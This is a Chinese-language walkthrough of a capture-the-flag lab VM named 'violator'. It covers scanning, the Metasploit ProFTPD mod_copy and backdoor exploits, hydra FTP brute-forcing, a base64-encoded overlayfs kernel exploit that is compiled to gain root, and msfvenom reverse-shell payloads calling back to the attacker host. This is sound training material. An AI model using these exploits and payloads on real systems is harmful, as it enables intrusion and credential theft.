关于
信息收集
- 网卡:虚拟机vmnet8
➜ ~ ip addr show dev vmnet8
5: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
inet 172.16.249.1/24 brd 172.16.249.255 scope global vmnet8
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fec0:8/64 scope link
valid_lft forever preferred_lft forever
➜ ~ nmap -T4 -A 172.16.249.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 08:09 CST
Nmap scan report for 172.16.249.1
Host is up (0.00013s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
902/tcp open ssl/vmware-auth VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
Nmap scan report for 172.16.249.129
Host is up (0.00035s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5rc3
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: I Say... I say... I say Boy! You pumpin' for oil or somethin'...?
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (2 hosts up) scanned in 72.25 seconds
- IP:172.16.249.129,Ubuntu开放端口21和80。主页里有一张图片和一个wiki的链接,可能是突破口。
➜ ~ curl -L http://172.16.249.129/
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
<body>
<br>I Say.. I say... I say boy! You're barkin up the wrong tree!</br>
<img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
<-- https://en.wikipedia.org/wiki/Violator_(album) -->
</body>
</html>
- 不是WordPress框架,还是用nikto扫一下吧,什么也没发现,看了foggie.jpg的exif信息也没发现。
➜ ~ nikto -h http://172.16.249.129/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.249.129
+ Target Hostname: 172.16.249.129
+ Target Port: 80
+ Start Time: 2018-08-06 08:16:20 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x13e 0x53518115c6709
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2018-08-06 08:16:28 (GMT8) (8 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
- 所以目标转向了FTP,在nmap的返回结果中可看到
ProFTPD 1.3.5rc3
,找相关版本是否存在漏洞。
➜ ~ searchsploit ProFTPD 1.3.5
-------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
Exploit Title | Path
| (/home/kali-team/Kali-Team/exploit-database/)
-------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | exploits/linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | exploits/linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | exploits/linux/remote/36742.txt
-------------------------------------------------------------------------------------------------------------------------- --------------------------------------------------------------
漏洞利用
- 三个漏洞都可以利用,这里使用第一个Metasploit框架中的,比较方便。
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > show options
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 ProFTPD 1.3.5
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost 172.16.249.129
rhost => 172.16.249.129
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
sitepath => /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] 172.16.249.129:80 - 172.16.249.129:21 - Connected to FTP server
[*] 172.16.249.129:80 - 172.16.249.129:21 - Sending copy commands to FTP server
[*] 172.16.249.129:80 - Executing PHP payload /O8hgrL.php
[*] Command shell session 1 opened (172.16.249.1:4444 -> 172.16.249.129:33406) at 2018-08-06 14:10:35 +0800
ls
O8hgrL.php
foggie.jpg
i0KEqK.php
index.html
- 系统是Ubuntu,所以路径设置为
/var/www/html
,目录下的两个PHP文件就是Metasploit生成的后门。
whoami
www-data
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/srv/ftp:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
uname -a
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
- 发现有几个用户名
dg mg af aw
,上传到服务器试了,有提权漏洞,但www-data不能用sudo。
www-data@violator:/var/www/html$ cat /etc/group
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:syslog,dg
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:dg
floppy:x:25:
tape:x:26:
sudo:x:27:dg
audio:x:29:
dip:x:30:dg
www-data:x:33:
backup:x:34:
operator:x:37:
list:x:38:
irc:x:39:
src:x:40:
gnats:x:41:
shadow:x:42:
utmp:x:43:
video:x:44:
sasl:x:45:
plugdev:x:46:dg
staff:x:50:
games:x:60:
users:x:100:mg,af,aw
nogroup:x:65534:
libuuid:x:101:
netdev:x:102:
crontab:x:103:
syslog:x:104:
fuse:x:105:
messagebus:x:106:
mlocate:x:107:
ssh:x:108:
landscape:x:109:
dg:x:1000:
lpadmin:x:110:dg
sambashare:x:111:dg
ssl-cert:x:112:
mg:x:1001:
af:x:1002:
aw:x:1003:
- 能sudo的只有dg一个用户,去翻一下各个用户的home目录。然后找到下面的信息。
www-data@violator:/home/af$ ls
ls
minarke-1.21 minarke-1.21.tar.bz2
www-data@violator:/home/aw$ file hint
file hint
hint: ASCII text
www-data@violator:/home/aw$ cat hint
cat hint
You are getting close... Can you crack the final enigma..?
www-data@violator:/home/aw$
www-data@violator:/home$ ls dg
ls dg
bd
www-data@violator:/home/mg$ file faith_and_devotion
file faith_and_devotion
faith_and_devotion: ASCII text
www-data@violator:/home/mg$ cat faith_and_devotion
cat faith_and_devotion
Lyrics:
* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D
www-data@violator:/home/mg$
- 全部复制到
/var/www/html
下载会本地。思路断了,外国的东西看不懂。然后看会了前期发现的wiki。想到了用CeWL把wiki的单词爬下来当字典,爆破那四个用户。CeWL的说明介绍。我其实是把专辑和歌名那一部分去掉空格作为密码字典的。
CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper.
➜ CeWL git:(master) ✗ ./cewl.rb -v 'https://en.wikipedia.org/wiki/Violator_(album)' -d 1 -w pass.txt
➜ CeWL git:(master) ✗ cat pass.txt |wc -l
10429
➜ CeWL git:(master) ✗ hydra -L user.txt -P pass.txt -u 172.16.249.129 ftp
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-07 18:56:59
[DATA] max 16 tasks per 1 server, overall 16 tasks, 92 login tries (l:4/p:23), ~6 tries per task
[DATA] attacking ftp://172.16.249.129:21/
[21][ftp] host: 172.16.249.129 login: aw password: sweetestperfection
[21][ftp] host: 172.16.249.129 login: af password: enjoythesilence
[21][ftp] host: 172.16.249.129 login: mg password: bluedress
[21][ftp] host: 172.16.249.129 login: dg password: policyoftruth
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
➜ CeWL git:(master) ✗
提权
- 第一种时直接上exp,因为msf拿到的shell没有上传功能,一句话木马好像也不行。所以先把exp.c转为base64,再写到shell里,到了服务器那边再解码成exp.c,然后编译执行。
➜ ~ searchsploit -p 39166
Exploit: Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)
URL: https://www.exploit-db.com/exploits/39166/
Path: /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c
File Type: C source, ASCII text, with CRLF line terminators
➜ ~ cp /home/kali-team/Kali-Team/exploit-database/exploits/linux/local/39166.c exp.c
➜ ~ cat exp.c|base64
LyoNCmp1c3QgYW5vdGhlciBvdmVybGF5ZnMgZXhwbG9pdCwgd29ya3Mgb24ga2VybmVscyBiZWZv
cmUgMjAxNS0xMi0yNg0KDQojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290DQoj
IERhdGU6IDIwMTYtMDEtMDUNCiMgRXhwbG9pdCBBdXRob3I6IHJlYmVsDQojIFZlcnNpb246IFVi
dW50dSAxNC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlDQojIFRlc3RlZCBvbjogVWJ1bnR1IDE0LjA0
IExUUywgMTUuMTANCiMgQ1ZFIDogQ1ZFLTIwMTUtODY2MA0KDQpibGFoQHVidW50dTp+JCBpZA0K
dWlkPTEwMDEoYmxhaCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTEwMDEoYmxhaCkNCmJsYWhAdWJ1
bnR1On4kIHVuYW1lIC1hICYmIGNhdCAvZXRjL2lzc3VlDQpMaW51eCB1YnVudHUgMy4xOS4wLTQy
LWdlbmVyaWMgIzQ4fjE0LjA0LjEtVWJ1bnR1IFNNUCBGcmkgRGVjIDE4IDEwOjI0OjQ5IFVUQyAy
MDE1IHg4Nl82NCB4ODZfNjQgeDg2XzY0IEdOVS9MaW51eA0KVWJ1bnR1IDE0LjA0LjMgTFRTIFxu
IFxsDQpibGFoQHVidW50dTp+JCAuL292ZXJsYXlmYWlsDQpyb290QHVidW50dTp+IyBpZA0KdWlk
PTAocm9vdCkgZ2lkPTEwMDEoYmxhaCkgZ3JvdXBzPTAocm9vdCksMTAwMShibGFoKQ0KDQoxMi8y
MDE1DQpieSByZWJlbA0KDQo2MzU0YjRlMjNkYjIyNWI1NjVkNzlmMjI2ZjJlNDllYzBmZTFlMTli
DQoqLw0KDQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxzY2hlZC5oPg0KI2luY2x1ZGUg
PHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5j
bHVkZSA8c3lzL3N0YXQuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMv
bW91bnQuaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1
ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHNjaGVkLmg+DQojaW5jbHVkZSA8c3lzL3N0YXQuaD4N
CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzeXMvbW91bnQuaD4NCiNpbmNsdWRl
IDxzeXMvdHlwZXMuaD4NCiNpbmNsdWRlIDxzaWduYWwuaD4NCiNpbmNsdWRlIDxmY250bC5oPg0K
I2luY2x1ZGUgPHN0cmluZy5oPg0KI2luY2x1ZGUgPGxpbnV4L3NjaGVkLmg+DQojaW5jbHVkZSA8
c3lzL3dhaXQuaD4NCg0Kc3RhdGljIGNoYXIgY2hpbGRfc3RhY2tbMTAyNCoxMDI0XTsNCg0Kc3Rh
dGljIGludA0KY2hpbGRfZXhlYyh2b2lkICpzdHVmZikNCnsNCiAgICBzeXN0ZW0oInJtIC1yZiAv
dG1wL2hheGhheCIpOw0KICAgIG1rZGlyKCIvdG1wL2hheGhheCIsIDA3NzcpOw0KICAgIG1rZGly
KCIvdG1wL2hheGhheC93IiwgMDc3Nyk7DQogICAgbWtkaXIoIi90bXAvaGF4aGF4L3UiLDA3Nzcp
Ow0KICAgIG1rZGlyKCIvdG1wL2hheGhheC9vIiwwNzc3KTsNCg0KICAgIGlmIChtb3VudCgib3Zl
cmxheSIsICIvdG1wL2hheGhheC9vIiwgIm92ZXJsYXkiLCBNU19NR0NfVkFMLCAibG93ZXJkaXI9
L2Jpbix1cHBlcmRpcj0vdG1wL2hheGhheC91LHdvcmtkaXI9L3RtcC9oYXhoYXgvdyIpICE9IDAp
IHsNCglmcHJpbnRmKHN0ZGVyciwibW91bnQgZmFpbGVkLi5cbiIpOw0KICAgIH0NCg0KICAgIGNo
bW9kKCIvdG1wL2hheGhheC93L3dvcmsiLDA3NzcpOw0KICAgIGNoZGlyKCIvdG1wL2hheGhheC9v
Iik7DQogICAgY2htb2QoImJhc2giLDA0NzU1KTsNCiAgICBjaGRpcigiLyIpOw0KICAgIHVtb3Vu
dCgiL3RtcC9oYXhoYXgvbyIpOw0KICAgIHJldHVybiAwOw0KfQ0KDQppbnQNCm1haW4oaW50IGFy
Z2MsIGNoYXIgKiphcmd2KQ0Kew0KICAgIGludCBzdGF0dXM7DQogICAgcGlkX3Qgd3JhcHBlciwg
aW5pdDsNCiAgICBpbnQgY2xvbmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7DQogICAg
c3RydWN0IHN0YXQgczsNCg0KICAgIGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7DQogICAg
ICAgIGlmKHVuc2hhcmUoQ0xPTkVfTkVXVVNFUikgIT0gMCkNCiAgICAgICAgICAgIGZwcmludGYo
c3RkZXJyLCAiZmFpbGVkIHRvIGNyZWF0ZSBuZXcgdXNlciBuYW1lc3BhY2VcbiIpOw0KDQogICAg
ICAgIGlmKChpbml0ID0gZm9yaygpKSA9PSAwKSB7DQogICAgICAgICAgICBwaWRfdCBwaWQgPQ0K
ICAgICAgICAgICAgICAgIGNsb25lKGNoaWxkX2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAy
NCksIGNsb25lX2ZsYWdzLCBOVUxMKTsNCiAgICAgICAgICAgIGlmKHBpZCA8IDApIHsNCiAgICAg
ICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVhdGUgbmV3IG1vdW50IG5h
bWVzcGFjZVxuIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgICAgICB9DQoN
CiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVzLCAwKTsNCg0KICAgICAgICB9DQoNCiAg
ICAgICAgd2FpdHBpZChpbml0LCAmc3RhdHVzLCAwKTsNCiAgICAgICAgcmV0dXJuIDA7DQogICAg
fQ0KDQogICAgdXNsZWVwKDMwMDAwMCk7DQoNCiAgICB3YWl0KE5VTEwpOw0KDQogICAgc3RhdCgi
L3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7DQoNCiAgICBpZihzLnN0X21vZGUgPT0gMHg4OWVkKQ0K
ICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwiLWMiLCJybSAt
cmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3VpZCgwLDAsMCk7
b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7DQoNCiAgICBmcHJpbnRmKHN0
ZGVyciwiY291bGRuJ3QgY3JlYXRlIHN1aWQgOihcbiIpOw0KICAgIHJldHVybiAtMTsNCn0=
➜ ~
- 在服务器这边把base64解码
dg@violator:/var/www/html$ cat exp.txt|base64 -d >exp.c
cat exp.txt|base64 -d >exp.c
dg@violator:/var/www/html$ gcc exp.c
gcc exp.c
dg@violator:/var/www/html$ ls
ls
a.out exp.c exp.txt J0dov8.php jc7gX.php vMZTOjJ.php
dg@violator:/var/www/html$ ./a.out
./a.out
root@violator:/var/www/html# id
id
uid=0(root) gid=1000(dg) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(dg)
root@violator:/var/www/html#
- 第二种提权的方法,用用户名:dg密码:policyoftruth登上FTP,切换的
/var/www/html
然后上传Meterpreter-shell。
- 生成meterpreter-shell,FTP上传直接PUT就可以了
➜ ~ msfvenom -p php/meterpreter_reverse_tcp LPORT=7788 LHOST=172.16.249.1 -f raw -o msf.php
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf exploit(multi/handler) > set lport 7788
lport => 7788
msf exploit(multi/handler) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 172.16.249.1:7788
[*] Meterpreter session 1 opened (172.16.249.1:7788 -> 172.16.249.129:35623) at 2018-08-07 20:36:38 +0800
- 这个功能比较多,我平时也是用这个payload的。
www-data@violator:/var/www/html$ su dg
su dg
Password: policyoftruth
dg@violator:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User dg may run the following commands on violator:
(ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:/var/www/html$
- 上面可以看到
proftpd
这个守护进程是以root权限运行的,而这东西又刚刚好有漏洞。而且执行不要root密码。我们切换到/home/dg/bd/sbin/proftpd
把proftpd以root权限执行起来。接着就是去利用漏洞了。
dg@violator:/var/www/html$ cd /home/dg/bd/sbin/
cd /home/dg/bd/sbin/
dg@violator:~/bd/sbin$ ls
ls
ftpscrub ftpshut in.proftpd proftpd
dg@violator:~/bd/sbin$ ls -al
ls -al
total 564
drwxr-xr-x 2 root root 4096 Jun 6 2016 .
drwxr-xr-x 10 root root 4096 Jun 6 2016 ..
-rwxr-xr-x 1 root root 15976 Jun 6 2016 ftpscrub
-rwxr-xr-x 1 root root 10456 Jun 6 2016 ftpshut
lrwxrwxrwx 1 root root 7 Jun 6 2016 in.proftpd -> proftpd
-rwxr-xr-x 1 root root 537488 Jun 6 2016 proftpd
dg@violator:~/bd/sbin$ sudo ./proftpd
sudo ./proftpd
- setting default address to 127.0.0.1
localhost - SocketBindTight in effect, ignoring DefaultServer
dg@violator:~/bd/sbin$
dg@violator:~/bd/sbin$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2121 0.0.0.0:* LISTEN -
tcp 0 0 172.16.249.129:60704 172.16.249.1:4444 CLOSE_WAIT -
tcp 0 0 172.16.249.129:60705 172.16.249.1:4444 CLOSE_WAIT -
tcp 0 0 172.16.249.129:35623 172.16.249.1:7788 ESTABLISHED 2669/bash
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 172.16.249.129:80 172.16.249.1:51132 ESTABLISHED -
dg@violator:~/bd/sbin$
- 现在守护进程已经跑起来了,监听的端口是2121,但是只能由127.0.0.1访问,所以要做端口转发。
meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
[*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/
set payload cmd/unix/bind_perl
set payload cmd/unix/bind_perl_ipv6
set payload cmd/unix/generic
set payload cmd/unix/reverse
set payload cmd/unix/reverse_bash_telnet_ssl
set payload cmd/unix/reverse_perl
set payload cmd/unix/reverse_perl_ssl
set payload cmd/unix/reverse_ssl_double_telnet
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 172.16.249.1
lhost => 172.16.249.1
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options
Module options (exploit/unix/ftp/proftpd_133c_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.249.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[-] Exploit failed: The following options failed to validate: RHOST.
[*] Exploit completed, but no session was created.
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rport 2121
rport => 2121
msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf exploit(unix/ftp/proftpd_133c_backdoor) > run
[*] Started reverse TCP handler on 172.16.249.1:4444
[*] 127.0.0.1:2121 - Sending Backdoor Command
[*] Command shell session 2 opened (172.16.249.1:4444 -> 172.16.249.129:60709) at 2018-08-07 21:05:32 +0800
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
- 那到root权限了,接下来去夺旗。
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/# ls
ls
bin dev home lib lost+found mnt proc run srv tmp var
boot etc initrd.img lib64 media opt root sbin sys usr vmlinuz
root@violator:/# cd /root
cd /root
root@violator:/root# ls
ls
flag.txt
root@violator:/root# cat flag.txt
cat flag.txt
I say... I say... I say boy! Pumping for oil or something...?
---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
root@violator:/root#
彩蛋
- 在root目录下有一个隐藏文件夹,下载回来看看发现有密码。
root@violator:/root# ll
ll
total 24
drwx------ 3 root root 4096 Jun 14 2016 ./
drwxr-xr-x 22 root root 4096 Jun 14 2016 ../
-rw-r--r-- 1 root root 3106 Feb 20 2014 .bashrc
d--x------ 2 root root 4096 Jun 14 2016 .basildon/
-rw-r--r-- 1 root root 114 Jun 12 2016 flag.txt
-rw-r--r-- 1 root root 140 Feb 20 2014 .profile
root@violator:/root# cd .basildon/
cd .basildon/
root@violator:/root/.basildon# ls
ls
crocs.rar
root@violator:/root/.basildon#
➜ DOWNLOAD john hash --wordlist=/home/kali-team/Kali-Team/password-recovery/CeWL/pass
Warning: detected hash type "rar", but the string is also recognized as "rar-opencl"
Use the "--format=rar-opencl" option to force loading these as that type instead
Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
World in My Eyes (crocs.rar)
1g 0:00:00:00 DONE (2018-08-07 21:20) 3.703g/s 88.88p/s 88.88c/s 88.88C/s enjoythesilence..World in My Eyes
Use the "--show" option to display all of the cracked passwords reliably
Session completed
- 密码破解出来是World in My Eyes,别问我怎么知道的,情节需要。现在到隐写
➜ DOWNLOAD exiftool artwork.jpg
ExifTool Version Number : 11.01
File Name : artwork.jpg
Directory : .
File Size : 183 kB
File Modification Date/Time : 2016:06:12 14:38:12+08:00
File Access Date/Time : 2018:08:07 21:23:12+08:00
File Inode Change Date/Time : 2018:08:07 21:23:12+08:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 300
Y Resolution : 300
Exif Byte Order : Big-endian (Motorola, MM)
Image Description : Violator
Software : Google
Artist : Dave Gaham
Copyright : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Exif Version : 0220
Date/Time Original : 1990:03:19 22:13:30
Create Date : 1990:03:19 22:13:30
Sub Sec Time Original : 04
Sub Sec Time Digitized : 04
Exif Image Width : 1450
Exif Image Height : 1450
XP Title : Violator
XP Author : Dave Gaham
XP Keywords : created by user dg
XP Subject : policyoftruth
Padding : (Binary data 1590 bytes, use -b option to extract)
About : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b
Rights : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
Creator : Dave Gaham
Subject : created by user dg
Title : Violator
Description : Violator
Warning : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
Date Acquired : 1941:05:09 10:30:18.134
Last Keyword XMP : created by user dg
Image Width : 1450
Image Height : 1450
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 1450x1450
Megapixels : 2.1
Create Date : 1990:03:19 22:13:30.04
Date/Time Original : 1990:03:19 22:13:30.04
➜ DOWNLOAD
- 版权那两个地方非常突出了,但是又不是base64,然后在mg目录发现的歌词和一个C程序没用上。
Lyrics:
- Use Wermacht with 3 rotors
- Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D
- 看来那个C程序是解这串字的,但是他卡住了。
➜ minarke-1.21 ./minarke
Minarke, an Enigma M4 emulator
by John Gilbert
Emulates the Kriegsmarine M4 Enigma encryption machine
Initial Setup Notes
Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them)
Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic
Ring and position settings: A-Z for each of the 4 rotors
Reflector setting is always fixed at A.
Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
Hit return to end input, 11 pairs recomended for maximum security.
Hit ESC at any time to quit.
Special Keys (during input mode)
1: rewind one setting
2: reset position settings
3: new position settings
4: new setup
9: toggle debug
0: show position settings
?: show help
see http://en.wikipedia.org/wiki/Enigma_machine
also http://www.bytereef.org/m4_project.html
Rotors:
- Google找在线的解密工具,解了也看不懂,没有空格分开翻译不了,反正flag拿到了。
